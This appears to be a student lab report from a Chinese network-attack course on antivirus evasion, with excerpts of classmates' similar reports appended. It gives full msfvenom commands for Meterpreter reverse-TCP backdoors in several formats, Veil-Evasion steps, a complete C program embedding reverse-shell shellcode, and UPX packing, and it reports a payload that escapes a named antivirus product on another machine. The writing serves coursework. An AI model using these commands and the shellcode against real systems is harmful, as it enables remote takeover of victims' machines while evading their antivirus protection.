2019-2020-2 20175321吴丁成《网络对抗技术》Exp3 免杀原理与实践

目录

  • 2019-2020-2 20175321吴丁成《网络对抗技术》Exp3 免杀原理与实践

    • 一、实践目标
    • 二、基础知识
    • 三、实验内容
      • 1.正确使用免杀工具或技巧

        • 1.1正确使用msf编码器
        • 1.2msfvenom生成如jar之类的其他文件
        • 1.3使用veil-evasion生成后门程序
        • 1.4使用C+shellcode编程生成后门程序
        • 1.5加壳工具
        • 1.6其他方法
      • 2.通过组合应用各种技术实现恶意代码免杀
      • 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
    • 四、实验总结与体会
      • 1.基础问题回答
    • (1)杀软是如何检测出恶意代码的?
    • (2)免杀是做什么?
    • (3)免杀的基本方法有哪些?
      • 2.实践总结与体会
      • 3.开启杀软能绝对防止电脑中恶意代码吗?

2019-2020-2 20175321吴丁成《网络对抗技术》Exp3 免杀原理与实践

一、实践目标

  • 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
  • 通过组合应用各种技术实现恶意代码免杀
  • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

二、基础知识

  • 免杀原理:
  • 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。
  • 如果要做好免杀,就要清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。

三、实验内容

1.正确使用免杀工具或技巧

1.1正确使用msf编码器

实验二中已经生成的后门程序放到VirusTotal中查看结果:

由此可见不加任何处理的后门程序能够被大多数杀软检测到,接下来用msf编码器对后门程序进行一次到多次的编码,并进行检测。

在kali中输入:

	msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00‘ LHOST=192.168.1.20 LPORT=5321 -f exe > exp3.exe

生成一次编码的后门程序的检测结果:

生成十次编码的后门程序:

	msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00‘ LHOST=192.168.1.20 LPORT=5321 -f exe > encoded10.exe

由此可见多次编码还是有一定的效果的,经过多次编码处理后的后门程序被检测出的概率下降了一点点,但是大多数杀软还是可以将其检测出来。

1.2msfvenom生成如jar之类的其他文件

生成jar文件:

	msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321jar.jar

生成jsp文件:

	msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321jsp.jsp

生成php文件:

	msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321php.php

生成apk文件:

	msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321apk.apk

1.3使用veil-evasion生成后门程序

使用sudo apt-get install veil进行veil的安装:

安装完成后输入veil命令:

输入use evasion,显示如下:

之后输入命令use c/meterpreter/rev_tcp.py进入配置界面:

使用set LHOST 192.168.1.20设置反弹连接IP地址

使用set LPORT 5321设置端口

使用generate命令生成文件,接着输入生成的playload的名称veil20175321,保存路径为/var/lib/veil/output/source/veil20175321.exe

到virustotal中看看veil生成的隐蔽性如何:

效果还是不怎么好啊。

1.4使用C+shellcode编程生成后门程序

使用如下指令生成shellcode:

	msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 -f c

创建20175321.c,将buf添加到代码中

	unsigned char buf[] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
	"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
	"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
	"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
	"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
	"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
	"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
	"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
	"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
	"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
	"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
	"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x7a\x88"
	"\x68\x02\x00\x14\xc5\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
	"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
	"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
	"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
	"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
	"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
	"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
	"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
	"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
	"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
	"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
	int main()
	{
	    int (*func)() = (int(*)())buf;
	    func();
	}

使用i686-w64-mingw32-g++ 20175321.c -o 20175321.exe生成exe可执行文件

在virustotal中查看效果:

大多数杀软还是能发现的。

1.5加壳工具

使用命令upx 20175321.exe -o 20175321pro.exe对20175321.exe加壳

上传到virustotal中:

加壳以后能够检测出的杀软少了几个,但是大部分的杀软还是可以检测出来的。

1.6其他方法

采用Veil-Evasion的其他荷载生成后门方式

进入evasion,使用list查看可用的有效荷载:

我选择的是第32个荷载,是Python下shellcode在DES下加密一种

输入option查看有效荷载的选项

修改用户名后使用generate生成,选择shellcode平台时选择2:msfvenom,payloads与IP、端口号使用tab自动获取

输入生成文件的文件名,选择Py2Exe生成exe文件

之后,生成的rc文件放入了路径/var/lib/veil/output/handlers/中,可执行文件放入了/var/lib/veil/output/source/ 中

将可执行文件上传到virustotal中看看效果:

2.通过组合应用各种技术实现恶意代码免杀

  • 使用上一个部分采用Veil-Evasion生成的Python下shellcode在DES下加密文件已经可以通过杀软检查,所以这步中我使用了Python下shellcode使用DES加密的载荷+加密壳生成的文件:

3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

电脑环境:win10主机

杀毒引擎:联想电脑管家

杀软版本:2.8.100.3131

木马库版本时间:2020-04-01 17:59:23

四、实验总结与体会

1.基础问题回答

  • (1)杀软是如何检测出恶意代码的?

    • 通过检测代码中的特征码或者某些特征片段,将其于自己的特征码库进行比对,如代码中检测出特征码或者某些特征片段,就将其判定为恶意代码。(长得像鸭子)
    • 启发式恶意软件检测:就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,它就被当做了恶意软件。(叫声像鸭子)
    • 基于行为的恶意软件检测:相当于是启发式的一种,或者是加入了行为监控的启发式。(走路像鸭子)
  • (2)免杀是做什么?

    • 通过对恶意代码加壳或者进行编码等操作,隐藏代码中的特征码或者某些特征片段,起到瞒天过海的作用,使得杀软不容易检测出该恶意代码。
  • (3)免杀的基本方法有哪些?

    • 改变特征码:使用encoder进行编码、重新编译生成可执行文件、加壳等手段改变特征码
    • 改变行为:使用反弹式连接、隧道技术与加密通讯的数据。同时加入正常功能代码、尽量减少对系统的修改。

2.实践总结与体会

在本次实验过程中,我使用了几种不同的方法进行免杀尝试,其中有的比较靠谱,有的不咋地。通过本次实验,我进一步理解了免杀原理,同时对杀毒软件的可靠性有了新的认识。但是杀毒软件不是神,也不是万能的,很多其他方面的防护还需要我们提高警惕,不访问不安全的网站,下载软件从官网下载,不下载来路不明的软件,这样才能减少我们在平时的学习和生活中使用的计算机遇到恶意代码的概率。

3.开启杀软能绝对防止电脑中恶意代码吗?

不能,通过本次实验已经能看出杀软不能检测出所有的恶意软件,杀软的病毒库中如果没有记录该特征片段,或着没有检测该恶意代码的有效手段则无法检测到该恶意代码,就不能及时杀掉电脑中的恶意代码。

原文地址:https://www.cnblogs.com/Brass/p/12630186.html

时间: 2024-10-27 17:53:44

2019-2020-2 20175321吴丁成《网络对抗技术》Exp3 免杀原理与实践的相关文章

2019-2020-2 20175208 张家华 网络对抗技术 Exp3 免杀原理与实践

实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具.使用C + shellcode编程或使用其他课堂未介绍方法自己利用shellcode编程等免杀工具或技巧 2.通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 实验过程 实验准备即相关知识 VirusTotal.Virscan 集

2018~2019-4 20165107 网络对抗技术 Exp3 免杀原理与实践

20165107 Exp3 免杀原理与实践 实验要求 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧 2.通过组合应用各种技术实现恶意代码免杀 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:我们发现某类恶意代码经常出现的一段或多段代码,而且是其他正常程序没有的,这段或多段数据即特征码.如

20154307《网络对抗》Exp3 免杀原理与实践

20154307<网络对抗>Exp3 免杀原理与实践 一.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件. 启发式恶意软件检测 基于行为的恶意软件检测:检测程序是否会有一些恶意行为,如修改注册表,更改权限等等.. (2)免杀是做什么? 让攻击程序不被杀软查杀 (3)免杀的基本方法有哪些? 加壳 改变特征码 二.实践内容 1.使用msf生成后门程序的检测 由于上一个实验我们已经用msf生成了一

20155232《网络对抗》Exp3 免杀原理与实践

20155232<网络对抗>Exp3 免杀原理与实践 问题回答 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据. 如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. 启发式恶意软件检测 根据些片面特征去推断. 通用性,不精确. 基于行为的恶意软件检测 修改文件硬盘.连接恶意网站.修改注册表 (2)免杀是做什么? 通过一些手段来瞒过杀软的检测扫描.避免被杀毒软件查杀. (3)免杀的基本方法有哪些? 改变特征

20155302《网络对抗》Exp3 免杀原理与实践

20155302<网络对抗>Exp3 免杀原理与实践 实验要求 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧:(1.5分) 2.通过组合应用各种技术实现恶意代码免杀(1分) (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分) 实验内容 报告评分 1.5分报告整体观感 0.5分

20145309《网络对抗技术》免杀原理与实践

20145309<网络对抗技术>免杀原理与实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 根据特征来检测:对已存在的流行代码特征的提取与比对根据行为来检测:是否有更改注册表行为.是否有设置自启动.是否有修改权限等等 (2)免杀是做什么? 使用一些方法使得恶意程序不被杀软和防火墙发现,避免被查杀. (3)免杀的基本方法有哪些? 加壳:就是相当于把你的后门代码封装起来,但是现在大部分公开的壳都能被杀毒软件查出来,所以加这些壳还不如不加:加花指令:就是加一段垃圾代码,但是并不影响程序的正

20155218《网络对抗》Exp3 免杀原理与实践

20155218<网络对抗>Exp3 免杀原理与实践 一.使用msf生成后门程序的检测 (1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下: (2)使用msf时对它多编码1次并进行测试 发现能发现的杀软变少: (3)使用msf时对它多编码10次并进行测试 编码10次后,发现可以查杀的杀软数量仅仅减少了一个: 二.使用veil-evasion生成后门程序的检测 通过list查看功能,选用22命令 生成文件: 测试结果: 显而易见,效果并不理想: 三.利用shellco

20155338《网络对抗》Exp3 免杀原理与实践

20155338<网络对抗>Exp3 免杀原理与实践 实验过程 一.免杀效果参考基准 Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒. 二.使用msf编码器 编码一次,在Kali输入命令 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=kali的IP LPORT=533

20155330 《网络攻防》 Exp3 免杀原理与实践

20155330 <网络攻防> Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征码.先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码. 基于行为.杀软通过检测程序是否有更改注册表行为.是否有设置自启动.是否有修改权限等等行为进行判断. 免杀是做什么? 恶意代码避免杀毒软件查杀,从而实现入侵. 免杀的基本方法有哪些? 对恶意代码进行加壳 利用shellcode进行编码 实践过程记录 使用msf生成后门程序的检测 将实验二中